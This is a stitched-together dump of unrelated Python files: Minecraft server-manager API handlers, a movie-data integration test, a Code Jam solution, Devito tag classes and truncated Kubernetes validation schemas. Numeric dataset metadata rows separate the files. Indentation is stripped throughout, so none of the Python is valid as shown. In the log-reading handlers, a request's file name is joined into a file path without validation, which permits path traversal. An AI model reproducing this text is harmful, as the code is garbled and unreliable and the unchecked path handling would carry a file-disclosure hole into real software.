class SendCommand(BaseHandler):
def initialize(self, mcserver):
self.mcserver = mcserver
def post(self):
token = self.get_argument('token')
user = self.authenticate_user(token)
if user is None:
self.access_denied('unknown')
if not check_role_permission(user, 'api_access') and not check_role_permission(user, 'svr_control'):
self.access_denied(user)
command = self.get_body_argument('command', default=None, strip=True)
server_id = self.get_argument('id')
if command:
server = multi.get_server_obj(server_id)
if server.check_running:
server.send_command(command)
self.return_response(200, '', {"run": True}, '')
else:
self.return_response(200, {'error':'SER_NOT_RUNNING'}, {}, {})
else:
self.return_response(200, {'error':'NO_COMMAND'}, {}, {})
class GetHostStats(BaseHandler):
def initialize(self, mcserver):
self.mcserver = mcserver
def get(self):
token = self.get_argument('token')
user = self.authenticate_user(token)
if user is None:
self.access_denied('unknown')
if not check_role_permission(user, 'api_access') and not check_role_permission(user, 'logs'):
self.access_denied(user)
stats = multi.get_host_status()
stats.pop('time') # We dont need the request time
self.return_response(200, {}, stats, {})
class GetServerStats(BaseHandler):
def initialize(self, mcserver):
self.mcserver = mcserver
def get(self):
token = self.get_argument('token')
user = self.authenticate_user(token)
if user is None:
self.access_denied('unknown')
if not check_role_permission(user, 'api_access') and not check_role_permission(user, 'logs'):
self.access_denied(user)
stats = multi.get_stats_for_servers()
data = []
for server in stats:
server = stats[server]
server.pop('time') # We dont need the request time
data.append(server)
self.return_response(200, {}, data, {})
class SearchMCLogs(BaseHandler):
def initialize(self, mcserver):
self.mcserver = mcserver
def post(self):
token = self.get_argument('token')
user = self.authenticate_user(token)
if user is None:
self.access_denied('unknown')
if not check_role_permission(user, 'api_access') and not check_role_permission(user, 'logs'):
self.access_denied(user)
search_string = self.get_argument('query', default=None, strip=True)
server_id = self.get_argument('id')
server = multi.get_server_obj(server_id)
logfile = os.path.join(server.server_path, 'logs', 'latest.log')
data = helper.search_file(logfile, search_string)
line_list = []
if data:
for line in data:
line_list.append({'line_num': line[0], 'message': line[1]})
self.return_response(200, {}, line_list, {})
class GetMCLogs(BaseHandler):
def initialize(self, mcserver):
self.mcserver = mcserver
def get(self):
token = self.get_argument('token')
user = self.authenticate_user(token)
if user is None:
self.access_denied('unknown')
if not check_role_permission(user, 'api_access') and not check_role_permission(user, 'logs'):
self.access_denied(user)
server_id = self.get_argument('id')
server = multi.get_server_obj(server_id)
logfile = os.path.join(server.server_path, 'logs', 'latest.log')
data = helper.search_file(logfile, '')
line_list = []
if data:
for line in data:
line_list.append({'line_num': line[0], 'message': line[1]})
self.return_response(200, {}, line_list, {})
class GetCraftyLogs(BaseHandler):
def get(self):
token = self.get_argument('token')
user = self.authenticate_user(token)
if user is None:
self.access_denied('unknown')
if not check_role_permission(user, 'api_access') and not check_role_permission(user, 'logs'):
self.access_denied(user)
filename = self.get_argument('name')
logfile = os.path.join('logs', filename + '.log')
data = helper.search_file(logfile, '')
line_list = []
if data:
for line in data:
line_list.append({'line_num': line[0], 'message': line[1]})
self.return_response(200, {}, line_list, {})
class SearchCraftyLogs(BaseHandler):
def post(self):
token = self.get_argument('token')
user = self.authenticate_user(token)
if user is None:
self.access_denied('unknown')
if not check_role_permission(user, 'api_access') and not check_role_permission(user, 'logs'):
self.access_denied(user)
filename = self.get_argument('name')
query = self.get_argument('query')
logfile = os.path.join('logs', filename + '.log')
data = helper.search_file(logfile, query)
line_list = []
if data:
for line in data:
line_list.append({'line_num': line[0], 'message': line[1]})
self.return_response(200, {}, line_list, {})
class ForceServerBackup(BaseHandler):
def initialize(self, mcserver):
self.mcserver = mcserver
def post(self):
token = self.get_argument('token')
user = self.authenticate_user(token)
if user is None:
self.access_denied('unknown')
if not check_role_permission(user, 'api_access') and not check_role_permission(user, 'backups'):
self.access_denied(user)
server_id = self.get_argument('id')
server = multi.get_server_obj(server_id)
backup_thread = threading.Thread(name='backup', target=server.backup_server, daemon=False)
backup_thread.start()
self.return_response(200, {}, {'code':'SER_BAK_CALLED'}, {})
class StartServer(BaseHandler):
def initialize(self, mcserver):
self.mcserver = mcserver
def post(self):
token = self.get_argument('token')
user = self.authenticate_user(token)
if user is None:
self.access_denied('unknown')
if not check_role_permission(user, 'api_access') and not check_role_permission(user, 'svr_control'):
self.access_denied(user)
server_id = self.get_argument('id')
server = multi.get_server_obj(server_id)
if not server.check_running():
Remote.insert({
Remote.command: 'start_mc_server',
Remote.server_id: server_id,
Remote.command_source: "localhost"
}).execute()
self.return_response(200, {}, {'code':'SER_START_CALLED'}, {})
else:
self.return_response(500, {'error':'SER_RUNNING'}, {}, {})
class StopServer(BaseHandler):
def initialize(self, mcserver):
self.mcserver = mcserver
def post(self):
token = self.get_argument('token')
user = self.authenticate_user(token)
if user is None:
self.access_denied('unknown')
if not check_role_permission(user, 'api_access') and not check_role_permission(user, 'svr_control'):
self.access_denied(user)
server_id = self.get_argument('id')
server = multi.get_server_obj(server_id)
if server.check_running():
Remote.insert({
Remote.command: 'stop_mc_server',
Remote.server_id: server_id,
Remote.command_source: "localhost"
}).execute()
self.return_response(200, {}, {'code':'SER_STOP_CALLED'}, {})
else:
self.return_response(500, {'error':'SER_NOT_RUNNING'}, {}, {})
class RestartServer(BaseHandler):
def initialize(self, mcserver):
self.mcserver = mcserver
def post(self):
token = self.get_argument('token')
user = self.authenticate_user(token)
if user is None:
self.access_denied('unknown')
if not check_role_permission(user, 'api_access') and not check_role_permission(user, 'svr_control'):
self.access_denied(user)
server_id = self.get_argument('id')
server = multi.get_server_obj(server_id)
server.restart_threaded_server()
self.return_response(200, {}, {'code':'SER_RESTART_CALLED'}, {})
class CreateUser(BaseHandler):
def post(self):
token = self.get_argument('token')
user = self.authenticate_user(token)
if user is None:
self.access_denied('unknown')
if not check_role_permission(user, 'api_access') and not check_role_permission(user, 'config'):
self.access_denied(user)
new_username = self.get_argument("username")
# TODO: implement role checking
#new_role = self.get_argument("role", 'Mod')
if new_username:
new_pass = helper.random_string_generator()
new_token = secrets.token_urlsafe(32)
result = Users.insert({
Users.username: new_username,
Users.role: 'Mod',
Users.password: helper.encode_pass(new_pass),
Users.api_token: new_token
}).execute()
self.return_response(200, {}, {'code':'COMPLETE', 'username': new_username, 'password': new_pass, 'api_token': new_token}, {})
else:
self.return_response(500, {'error':'MISSING_PARAMS'}, {}, {'info':'Some paramaters failed validation'})
class DeleteUser(BaseHandler):
def post(self):
token = self.get_argument('token')
user = self.authenticate_user(token)
if user is None:
self.access_denied('unknown')
if not check_role_permission(user, 'api_access') and not check_role_permission(user, 'config'):
self.access_denied(user)
username = self.get_argument("username", None, True)
if username == 'Admin':
self.return_response(500, {'error':'NOT_ALLOWED'}, {}, {'info':'You cannot delete the admin user'})
else:
if username:
Users.delete().where(Users.username == username).execute()
self.return_response(200, {}, {'code':'COMPLETED'}, {})
class ListServers(BaseHandler):
def initialize(self, mcserver):
self.mcserver = mcserver
def get(self):
token = self.get_argument('token')
user = self.authenticate_user(token)
if user is None:
self.access_denied('unknown')
if not check_role_permission(user, 'api_access'):
self.access_denied(user)
self.return_response(200, {}, {"code": "COMPLETED", "servers": multi.list_servers()}, {})
| 33.823383 | 138 | 0.572994 | 1,474 | 13,597 | 5.085482 | 0.141791 | 0.048026 | 0.070971 | 0.079242 | 0.693837 | 0.677695 | 0.643943 | 0.634872 | 0.616195 | 0.616195 | 0 | 0.008198 | 0.318232 | 13,597 | 402 | 139 | 33.823383 | 0.800432 | 0.017798 | 0 | 0.633452 | 0 | 0 | 0.094022 | 0 | 0 | 0 | 0 | 0.002488 | 0 | 1 | 0.099644 | false | 0.017794 | 0.035587 | 0 | 0.199288 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
1ee2eaa1b69e4110f3a47a8efebc193125827f64 | 2,153 | py | Python | processes/tests/test_integration.py | kinoreel/kino-gather | defc0d6b311651f985467b5bfcfdbf77d73c10ae | [
"MIT"
] | null | null | null | processes/tests/test_integration.py | kinoreel/kino-gather | defc0d6b311651f985467b5bfcfdbf77d73c10ae | [
"MIT"
] | 3 | 2017-06-03T16:50:56.000Z | 2017-10-01T09:24:37.000Z | processes/tests/test_integration.py | kinoreel/kino-gather | defc0d6b311651f985467b5bfcfdbf77d73c10ae | [
"MIT"
] | null | null | null | import unittest
from processes.get_omdb import Main as get_omdb
from processes.get_tmdb import Main as get_tmdb
from processes.get_itunes import Main as get_itunes
from processes.get_amazon import Main as get_amazon
from processes.get_trailer import Main as get_trailer
from processes.get_youtube import Main as get_youtube
from processes.insert_errored import Main as insert_errored
from processes.insert_movies import Main as insert_movies
from processes.insert_movies import Main as insert_movies
from processes.insert_movies2companies import Main as insert_movies2companies
from processes.insert_movies2genres import Main as insert_movies2genres
from processes.insert_movies2keywords import Main as insert_movies2keywords
from processes.insert_movies2numbers import Main as insert_movies2numbers
from processes.insert_movies2persons import Main as insert_movies2persons
from processes.insert_movies2ratings import Main as insert_movies2ratings
from processes.insert_movies2streams import Main as insert_movies2streams
from processes.insert_movies2trailers import Main as insert_movies2trailers
class IntegrationTest(unittest.TestCase):
def test(self):
imdb_id = "tt5451118"
payload = {'imdb_id': imdb_id}
response = get_omdb().run({'imdb_id': imdb_id})
payload.update(response)
response = get_tmdb().run(payload)
payload.update(response)
response = get_trailer().run(payload)
payload.update(response)
response = get_itunes().run(payload)
payload.update(response)
response = get_amazon().run(payload)
payload.update(response)
response = get_youtube().run(payload)
payload.update(response)
print(payload)
# insert_movies().run(payload)
# insert_movies2companies().run(payload)
# insert_movies2keywords().run(payload)
# insert_movies2numbers().run(payload)
# insert_movies2persons().run(payload)
# insert_movies2ratings().run(payload)
# insert_movies2genres().run(payload)
# insert_movies2streams().run(payload)
# insert_movies2trailers().run(payload)
| 43.938776 | 77 | 0.764515 | 259 | 2,153 | 6.146718 | 0.146718 | 0.138819 | 0.128141 | 0.124372 | 0.218593 | 0.17902 | 0.17902 | 0.073492 | 0.073492 | 0.073492 | 0 | 0.01728 | 0.166744 | 2,153 | 48 | 78 | 44.854167 | 0.870123 | 0.151881 | 0 | 0.228571 | 0 | 0 | 0.012665 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.028571 | false | 0 | 0.514286 | 0 | 0.571429 | 0.028571 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
1ee52fe1eea1eb33ec6b8f41d0abb79ccd50ea30 | 1,935 | py | Python | 2018/1A/robot_cashier.py | AmauryLiet/CodeJam | 3e02bce287e3c640d89eea4b0d5878319c79d59b | [
"MIT"
] | null | null | null | 2018/1A/robot_cashier.py | AmauryLiet/CodeJam | 3e02bce287e3c640d89eea4b0d5878319c79d59b | [
"MIT"
] | null | null | null | 2018/1A/robot_cashier.py | AmauryLiet/CodeJam | 3e02bce287e3c640d89eea4b0d5878319c79d59b | [
"MIT"
] | null | null | null | N = int(input())
MAX, VAR, FIX = range(3)
# latest=9 r=3 b=4
# max_variable_fixed_values = [
# 3 4 5
# 2 3 3
# 2 1 5
# 2 4 2
# 2 2 4
# 2 5 1
# ]
def try_to_beat(latest_score, r, b, max_var_fixed):
our_score = 0
while b > 0:
if not r:
return -1
best_c_max_b, best_max_b = 0, 0
for max_b, variable, fixed in max_var_fixed:
this_c_max = min(
max_b,
b,
(latest_score - fixed - 1)//variable
)
if this_c_max > best_max_b: # and this_c_max > 0
best_c_max_b, best_max_b = ([max_b, variable, fixed], this_c_max)
if not best_max_b:
return -1
max_var_fixed.remove(best_c_max_b)
b -= best_max_b
r -= 1
our_score = max(
our_score,
best_c_max_b[FIX] + best_max_b*best_c_max_b[VAR]
)
return our_score
def initial_total_time(b, max_var_fixed):
initial_best_time = 0
for max_b, variable, fixed in max_var_fixed:
passed_bits = min(b, max_b)
b -= passed_bits
initial_best_time = max(
initial_best_time,
fixed + variable*passed_bits
)
if not b:
return initial_best_time
for case_id in range(1, N + 1):
r, b, c = map(int, input().split())
max_variable_fixed_values = sorted([
[*map(int, input().split())]
for _ in range(c)
], key=lambda item: item[MAX], reverse=True)
total_time = initial_total_time(b, max_variable_fixed_values)
print(total_time)
while True:
new_attempt = try_to_beat(total_time, r, b, max_variable_fixed_values.copy())
print(new_attempt)
if new_attempt == -1:
break
else:
total_time = new_attempt
print('Case #{}: {}'.format(case_id, total_time))
| 24.1875 | 85 | 0.54522 | 288 | 1,935 | 3.319444 | 0.208333 | 0.066946 | 0.050209 | 0.047071 | 0.192469 | 0.106695 | 0.106695 | 0.07113 | 0.07113 | 0.07113 | 0 | 0.028226 | 0.359173 | 1,935 | 79 | 86 | 24.493671 | 0.742742 | 0.05323 | 0 | 0.075472 | 0 | 0 | 0.00659 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.037736 | false | 0.056604 | 0 | 0 | 0.113208 | 0.056604 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
9493adf2b60df22181c7328199d9efdac249dd59 | 1,145 | py | Python | devito/data/meta.py | jrt54/devito | 5a63696db03ae77c0925fd4a96a531fd21308727 | [
"MIT"
] | 1 | 2020-09-17T02:53:06.000Z | 2020-09-17T02:53:06.000Z | devito/data/meta.py | jrt54/devito | 5a63696db03ae77c0925fd4a96a531fd21308727 | [
"MIT"
] | null | null | null | devito/data/meta.py | jrt54/devito | 5a63696db03ae77c0925fd4a96a531fd21308727 | [
"MIT"
] | null | null | null | from devito.tools import Tag
__all__ = ['DOMAIN', 'CORE', 'OWNED', 'HALO', 'NOPAD', 'FULL',
'LEFT', 'RIGHT', 'CENTER']
class DataRegion(Tag):
pass
CORE = DataRegion('core') # within DOMAIN
OWNED = DataRegion('owned') # within DOMAIN
DOMAIN = DataRegion('domain') # == CORE + OWNED
HALO = DataRegion('halo')
NOPAD = DataRegion('nopad') # == DOMAIN+HALO
FULL = DataRegion('full') # == DOMAIN+HALO+PADDING
class DataSide(Tag):
def __init__(self, name, val, flipto=None):
super(DataSide, self).__init__(name, val)
if flipto is not None:
self.flip = lambda: flipto
flipto.flip = lambda: self
else:
self.flip = lambda: self
def __lt__(self, other):
return self.val < other.val
def __le__(self, other):
return self.val <= other.val
def __gt__(self, other):
return self.val > other.val
def __ge__(self, other):
return self.val >= other.val
def __str__(self):
return self.name
__repr__ = __str__
LEFT = DataSide('left', -1)
CENTER = DataSide('center', 0)
RIGHT = DataSide('right', 1, LEFT)
| 22.9 | 62 | 0.603493 | 139 | 1,145 | 4.683453 | 0.323741 | 0.076805 | 0.092166 | 0.116743 | 0.202765 | 0.202765 | 0.202765 | 0.202765 | 0 | 0 | 0 | 0.003521 | 0.255895 | 1,145 | 49 | 63 | 23.367347 | 0.760563 | 0.070742 | 0 | 0 | 0 | 0 | 0.081285 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.181818 | false | 0.030303 | 0.030303 | 0.151515 | 0.454545 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 |
9495a56bdecb82a6a0d94d51b82b391d6b4dd77b | 36,691 | py | Python | bcs-ui/backend/templatesets/legacy_apps/configuration/k8s/constants.py | laodiu/bk-bcs | 2a956a42101ff6487ff521fb3ef429805bfa7e26 | [
"Apache-2.0"
] | 599 | 2019-06-25T03:20:46.000Z | 2022-03-31T12:14:33.000Z | bcs-ui/backend/templatesets/legacy_apps/configuration/k8s/constants.py | laodiu/bk-bcs | 2a956a42101ff6487ff521fb3ef429805bfa7e26 | [
"Apache-2.0"
] | 537 | 2019-06-27T06:03:44.000Z | 2022-03-31T12:10:01.000Z | bcs-ui/backend/templatesets/legacy_apps/configuration/k8s/constants.py | laodiu/bk-bcs | 2a956a42101ff6487ff521fb3ef429805bfa7e26 | [
"Apache-2.0"
] | 214 | 2019-06-25T03:26:05.000Z | 2022-03-31T07:52:03.000Z | # -*- coding: utf-8 -*-
"""
Tencent is pleased to support the open source community by making 蓝鲸智云PaaS平台社区版 (BlueKing PaaS Community
Edition) available.
Copyright (C) 2017-2021 THL A29 Limited, a Tencent company. All rights reserved.
Licensed under the MIT License (the "License"); you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://opensource.org/licenses/MIT
Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on
an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the
specific language governing permissions and limitations under the License.
"""
from backend.templatesets.legacy_apps.instance.funutils import update_nested_dict
from ..constants import FILE_DIR_PATTERN, KRESOURCE_NAMES, NUM_VAR_PATTERN
# 资源名称
K8S_RES_NAME_PATTERN = "^[a-z0-9]([-a-z0-9]*[a-z0-9])?(\.[a-z0-9]([-a-z0-9]*[a-z0-9])?)*$"
# 挂载卷名称限制
VOLUMR_NAME_PATTERN = "^[a-zA-Z{]{1}[a-zA-Z0-9-_{}]{0,254}$"
# TODO 验证变量的情况
PORT_NAME_PATTERN = "^[a-zA-Z{]{1}[a-zA-Z0-9-{}_]{0,254}$"
# configmap/secret key 名称限制
KEY_NAME_PATTERN = "^[.a-zA-Z{]{1}[a-zA-Z0-9-_.{}]{0,254}$"
# 亲和性验证
AFFINITY_MATCH_EXPRESSION_SCHEMA = {
"type": "array",
"items": {
"type": "object",
"required": ["key", "operator"],
"properties": {
"key": {"type": "string", "minLength": 1},
"operator": {"type": "string", "enum": ["In", "NotIn", "Exists", "DoesNotExist", "Gt", "Lt"]},
"values": {"type": "array", "items": {"type": "string", "minLength": 1}},
},
"additionalProperties": False,
},
}
POD_AFFINITY_TERM_SCHEMA = {
"type": "object",
"properties": {
"labelSelector": {"type": "object", "properties": {"matchExpressions": AFFINITY_MATCH_EXPRESSION_SCHEMA}},
"namespaces": {"type": "array", "items": {"type": "string"}},
"topologyKey": {"type": "string"},
},
"additionalProperties": False,
}
POD_AFFINITY_SCHEMA = {
"type": "object",
"properties": {
"requiredDuringSchedulingIgnoredDuringExecution": {"type": "array", "items": POD_AFFINITY_TERM_SCHEMA},
"preferredDuringSchedulingIgnoredDuringExecution": {
"type": "array",
"items": {
"type": "object",
"required": ["podAffinityTerm"],
"properties": {
"weight": {
"oneOf": [
{"type": "string", "pattern": NUM_VAR_PATTERN},
{"type": "number", "minimum": 1, "maximum": 100},
]
},
"podAffinityTerm": POD_AFFINITY_TERM_SCHEMA,
},
},
},
},
"additionalProperties": False,
}
# 健康检查 & 就绪检查
K8S_CHECK_SCHEMA = {
"type": "object",
"required": ["initialDelaySeconds", "periodSeconds", "timeoutSeconds", "failureThreshold", "successThreshold"],
"properties": {
"initialDelaySeconds": {
"oneOf": [{"type": "string", "pattern": NUM_VAR_PATTERN}, {"type": "number", "minimum": 0}]
},
"periodSeconds": {"oneOf": [{"type": "string", "pattern": NUM_VAR_PATTERN}, {"type": "number", "minimum": 1}]},
"timeoutSeconds": {
"oneOf": [{"type": "string", "pattern": NUM_VAR_PATTERN}, {"type": "number", "minimum": 1}]
},
"failureThreshold": {
"oneOf": [{"type": "string", "pattern": NUM_VAR_PATTERN}, {"type": "number", "minimum": 1}]
},
"successThreshold": {
"oneOf": [{"type": "string", "pattern": NUM_VAR_PATTERN}, {"type": "number", "minimum": 1}]
},
"exec": {"type": "object", "properties": {"command": {"type": "string"}}},
"tcpSocket": {"type": "object", "properties": {"port": {"oneOf": [{"type": "number"}, {"type": "string"}]}}},
"httpGet": {
"type": "object",
"properties": {
"port": {"oneOf": [{"type": "number"}, {"type": "string"}]},
"path": {"type": "string"},
"httpHeaders": {
"type": "array",
"items": {
"type": "object",
"properties": {"name": {"type": "string"}, "value": {"type": "string"}},
},
},
},
},
},
}
INIT_CONTAINER_SCHEMA = {
"type": "array",
"items": {
"type": "object",
"required": ["name", "image", "imagePullPolicy", "volumeMounts", "ports", "resources"],
"properties": {
"name": {"type": "string", "minLength": 1},
"image": {"type": "string", "minLength": 1},
"imagePullPolicy": {"type": "string", "enum": ["Always", "IfNotPresent", "Never"]},
"volumeMounts": {
"type": "array",
"items": {
"type": "object",
"required": ["name", "mountPath", "readOnly"],
"properties": {
"name": {"type": "string", "pattern": VOLUMR_NAME_PATTERN},
"mountPath": {"type": "string", "pattern": FILE_DIR_PATTERN},
"readOnly": {"type": "boolean"},
},
},
},
"ports": {
"type": "array",
"items": {
"type": "object",
"required": ["name", "containerPort"],
"properties": {
"name": {
"oneOf": [
{"type": "string", "pattern": "^$"},
{"type": "string", "pattern": PORT_NAME_PATTERN},
]
},
"containerPort": {
"oneOf": [
{"type": "string", "pattern": "^$"},
{"type": "string", "pattern": NUM_VAR_PATTERN},
{"type": "number", "minimum": 1, "maximum": 65535},
]
},
},
},
},
"command": {"type": "string"},
"args": {"type": "string"},
# 环境变量前端统一存放在 webCache.env_list 中,有后台组装为 env & envFrom
"env": {
"type": "array",
"items": {
"type": "object",
"required": ["name"],
"properties": {
"name": {"type": "string", "minLength": 1},
"value": {"type": "string"},
"valueFrom": {
"type": "object",
"properties": {
"fieldRef": {
"type": "object",
"required": ["fieldPath"],
"properties": {"fieldPath": {"type": "string"}},
},
"configMapKeyRef": {
"type": "object",
"required": ["name", "key"],
"properties": {
"name": {"type": "string", "minLength": 1},
"key": {"type": "string", "minLength": 1},
},
},
"secretKeyRef": {
"type": "object",
"required": ["name", "key"],
"properties": {
"name": {"type": "string", "minLength": 1},
"key": {"type": "string", "minLength": 1},
},
},
},
},
},
},
},
"envFrom": {
"type": "array",
"items": {
"type": "object",
"properties": {
"configMapRef": {
"type": "object",
"properties": {"name": {"type": "string", "minLength": 1}},
},
"secretRef": {"type": "object", "properties": {"name": {"type": "string", "minLength": 1}}},
},
},
},
"resources": {
"type": "object",
"properties": {
"limits": {
"type": "object",
"properties": {
"cpu": {
"oneOf": [
{"type": "string", "pattern": "^$"},
{"type": "string", "pattern": NUM_VAR_PATTERN},
{"type": "number", "minimum": 0},
]
},
"memory": {
"oneOf": [
{"type": "string", "pattern": "^$"},
{"type": "number", "minimum": 0},
{"type": "string", "pattern": NUM_VAR_PATTERN},
]
},
},
},
"requests": {
"type": "object",
"properties": {
"cpu": {
"oneOf": [
{"type": "string", "pattern": "^$"},
{"type": "number", "minimum": 0},
{"type": "string", "pattern": NUM_VAR_PATTERN},
]
},
"memory": {
"oneOf": [
{"type": "string", "pattern": "^$"},
{"type": "number", "minimum": 0},
{"type": "string", "pattern": NUM_VAR_PATTERN},
]
},
},
},
},
},
},
},
}
CONTAINER_SCHEMA = {
"type": "array",
"items": {
"type": "object",
"required": [
"name",
"image",
"imagePullPolicy",
"volumeMounts",
"ports",
"resources",
"livenessProbe",
"readinessProbe",
"lifecycle",
],
"properties": {
"name": {"type": "string", "minLength": 1},
"image": {"type": "string", "minLength": 1},
"imagePullPolicy": {"type": "string", "enum": ["Always", "IfNotPresent", "Never"]},
"volumeMounts": {
"type": "array",
"items": {
"type": "object",
"required": ["name", "mountPath", "readOnly"],
"properties": {
"name": {"type": "string", "pattern": VOLUMR_NAME_PATTERN},
"mountPath": {"type": "string", "pattern": FILE_DIR_PATTERN},
"readOnly": {"type": "boolean"},
},
},
},
"ports": {
"type": "array",
"items": {
"type": "object",
"required": ["name", "containerPort"],
"properties": {
"name": {
"oneOf": [
{"type": "string", "pattern": "^$"},
{"type": "string", "pattern": PORT_NAME_PATTERN},
]
},
"containerPort": {
"oneOf": [
{"type": "string", "pattern": "^$"},
{"type": "string", "pattern": NUM_VAR_PATTERN},
{"type": "number", "minimum": 1, "maximum": 65535},
]
},
},
},
},
"command": {"type": "string"},
"args": {"type": "string"},
# 环境变量前端统一存放在 webCache.env_list 中,有后台组装为 env & envFrom
"env": {
"type": "array",
"items": {
"type": "object",
"required": ["name"],
"properties": {
"name": {"type": "string", "minLength": 1},
"value": {"type": "string"},
"valueFrom": {
"type": "object",
"properties": {
"fieldRef": {
"type": "object",
"required": ["fieldPath"],
"properties": {"fieldPath": {"type": "string"}},
},
"configMapKeyRef": {
"type": "object",
"required": ["name", "key"],
"properties": {
"name": {"type": "string", "minLength": 1},
"key": {"type": "string", "minLength": 1},
},
},
"secretKeyRef": {
"type": "object",
"required": ["name", "key"],
"properties": {
"name": {"type": "string", "minLength": 1},
"key": {"type": "string", "minLength": 1},
},
},
},
},
},
},
},
"envFrom": {
"type": "array",
"items": {
"type": "object",
"properties": {
"configMapRef": {
"type": "object",
"properties": {"name": {"type": "string", "minLength": 1}},
},
"secretRef": {"type": "object", "properties": {"name": {"type": "string", "minLength": 1}}},
},
},
},
"resources": {
"type": "object",
"properties": {
"limits": {
"type": "object",
"properties": {
"cpu": {
"oneOf": [
{"type": "string", "pattern": "^$"},
{"type": "string", "pattern": NUM_VAR_PATTERN},
{"type": "number", "minimum": 0},
]
},
"memory": {
"oneOf": [
{"type": "string", "pattern": "^$"},
{"type": "number", "minimum": 0},
{"type": "string", "pattern": NUM_VAR_PATTERN},
]
},
},
},
"requests": {
"type": "object",
"properties": {
"cpu": {
"oneOf": [
{"type": "string", "pattern": "^$"},
{"type": "number", "minimum": 0},
{"type": "string", "pattern": NUM_VAR_PATTERN},
]
},
"memory": {
"oneOf": [
{"type": "string", "pattern": "^$"},
{"type": "number", "minimum": 0},
{"type": "string", "pattern": NUM_VAR_PATTERN},
]
},
},
},
},
},
"livenessProbe": K8S_CHECK_SCHEMA,
"readinessProbe": K8S_CHECK_SCHEMA,
"lifecycle": {
"type": "object",
"required": ["preStop", "postStart"],
"properties": {
"preStop": {"type": "object", "required": ["exec"], "properties": {"command": {"type": "string"}}},
"postStart": {
"type": "object",
"required": ["exec"],
"properties": {"command": {"type": "string"}},
},
},
},
},
},
}
K8S_DEPLOYMENT_SCHEMA = {
"type": "object",
"required": ["metadata", "spec"],
"properties": {
"metadata": {
"type": "object",
"required": ["name"],
"properties": {"name": {"type": "string", "pattern": K8S_RES_NAME_PATTERN}},
},
"spec": {
"type": "object",
"required": ["replicas", "strategy", "template"],
"properties": {
"replicas": {
"oneOf": [{"type": "string", "pattern": NUM_VAR_PATTERN}, {"type": "number", "minimum": 0}]
},
"strategy": {
"type": "object",
"required": ["type"],
"properties": {
"type": {"type": "string", "enum": ["RollingUpdate", "Recreate"]},
"rollingUpdate": {"type": "object", "required": ["maxUnavailable", "maxSurge"]},
},
},
"template": {
"type": "object",
"required": ["metadata", "spec"],
"properties": {
"metadata": {
"type": "object",
"properties": {"lables": {"type": "object"}, "annotations": {"type": "object"}},
},
"spec": {
"type": "object",
"required": [
"restartPolicy",
"terminationGracePeriodSeconds",
"nodeSelector",
"hostNetwork",
"dnsPolicy",
"volumes",
"containers",
],
"properties": {
"restartPolicy": {"type": "string", "enum": ["Always", "OnFailure", "Never"]},
"terminationGracePeriodSeconds": {
"oneOf": [
{"type": "string", "pattern": NUM_VAR_PATTERN},
{"type": "number", "minimum": 0},
]
},
"nodeSelector": {"type": "object"},
"hostNetwork": {"oneOf": [{"type": "number"}, {"type": "string"}]},
"dnsPolicy": {
"type": "string",
"enum": ["ClusterFirst", "Default", "None", "ClusterFirstWithHostNet"],
},
"volumes": {
"type": "array",
"items": {
"type": "object",
"required": ["name"],
"properties": {
"name": {"type": "string", "pattern": VOLUMR_NAME_PATTERN},
"hostPath": {
"type": "object",
"required": ["path"],
"properties": {
"path": {"type": "string", "pattern": FILE_DIR_PATTERN}
},
},
"emptyDir": {"type": "object"},
"configMap": {
"type": "object",
"required": ["name"],
"properties": {"name": {"type": "string", "minLength": 1}},
},
"secret": {
"type": "object",
"required": ["secretName"],
"properties": {"secretName": {"type": "string", "minLength": 1}},
},
"persistentVolumeClaim": {
"type": "object",
"required": ["claimName"],
"properties": {"claimName": {"type": "string", "minLength": 1}},
},
},
},
},
"containers": CONTAINER_SCHEMA,
"initContainers": INIT_CONTAINER_SCHEMA,
},
},
},
},
},
},
},
}
AFFINITY_SCHEMA = {
"type": "object",
"properties": {
"nodeAffinity": {
"type": "object",
"properties": {
"requiredDuringSchedulingIgnoredDuringExecution": {
"type": "object",
"required": ["nodeSelectorTerms"],
"properties": {
"nodeSelectorTerms": {
"type": "array",
"items": {
"type": "object",
"required": ["matchExpressions"],
"properties": {"matchExpressions": AFFINITY_MATCH_EXPRESSION_SCHEMA},
},
}
},
},
"preferredDuringSchedulingIgnoredDuringExecution": {
"type": "array",
"items": {
"type": "object",
"required": ["preference"],
"properties": {
"weight": {
"oneOf": [
{"type": "string", "pattern": NUM_VAR_PATTERN},
{"type": "number", "minimum": 1, "maximum": 100},
]
},
"preference": {
"type": "object",
"required": ["matchExpressions"],
"properties": {"matchExpressions": AFFINITY_MATCH_EXPRESSION_SCHEMA},
},
},
},
},
},
"additionalProperties": False,
},
"podAffinity": POD_AFFINITY_SCHEMA,
"podAntiAffinity": POD_AFFINITY_SCHEMA,
},
"additionalProperties": False,
}
# DS 与 Deployment 的差异项:滚动升级策略 中 选择 RollingUpdate 时,只可以选择 maxUnavailable
# "required": ["replicas", "strategy", "template"],
K8S_DAEMONSET_DIFF = {
